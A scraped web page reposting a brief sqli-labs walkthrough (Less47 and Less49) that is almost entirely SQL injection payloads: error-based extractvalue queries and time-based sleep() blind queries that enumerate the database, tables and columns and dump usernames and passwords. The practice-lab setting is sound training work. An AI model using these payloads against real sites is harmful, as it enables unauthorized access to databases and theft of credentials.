当前位置:网站首页>SQL injection Less47 (error injection) and Less49 (time blind injection)
SQL injection Less47 (error injection) and Less49 (time blind injection)
2022-07-31 22:51:00 【HUAWEI CLOUD】
Less47 and Less49 can't use rand() Boolean blind annotation
Because there are single quotes to closeorder by 'rand()' This statement obviously cannot be executedp>
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- flowable workflow all business concepts
- focus on!Haitai Fangyuan joins the "Personal Information Protection Self-discipline Convention"
- 了解下C# 匿名方法
- I don't know what to do with sync issues
- Input and output optimization
- 标段参数说明
- What is customer profile management?
- 10大主流3D建模技术
- Network security - crack WiFi through handshake packets (detailed tutorial)
- [QNX Hypervisor 2.2 User Manual]9.16 system
猜你喜欢
![[NLP] What is the memory of the model!](/img/d8/a367c26b51d9dbaf53bf4fe2a13917.png)
[NLP] What is the memory of the model!
SQL27 View user details of different age groups

Quick Start Tutorial for flyway

flowable workflow all business concepts

iNeuOS industrial Internet operating system, equipment operation and maintenance business and "low-code" form development tools

TestCafeSummary

Unity-通过预制件和克隆方法动态实现各个UGUI下控件的创建和显示

21. Support Vector Machine - Introduction to Kernel Functions

Recognize anomalies (you will understand after reading this)

Network security - crack WiFi through handshake packets (detailed tutorial)
随机推荐
Verilog implements a divide-by-9 with a duty cycle of 5/18
Several methods of mysql backup table
Daily--Kali opens SSH (detailed tutorial)
Document management and tools in the development process
AI automatic code writing plugin Copilot (co-pilot)
Quick Start Tutorial for flyway
Difference Between Stateless and Stateful
[QNX Hypervisor 2.2用户手册]9.14 set
(26) About menu of the top menu of Blender source code analysis
支付模块实现
【Acwing】第62场周赛 题解
[Open class preview]: Research and application of super-resolution technology in the field of video image quality enhancement
UOS统信系统 - WindTerm使用
How to identify fake reptiles?
21. Support Vector Machine - Introduction to Kernel Functions
二叉树非递归遍历
如何导入 Golang 外部包并使用它?
数据分析(一)——matplotlib
Linux environment redis cluster to build "recommended collection"
#yyds dry goods inventory# Interview must brush TOP101: the entry node of the ring in the linked list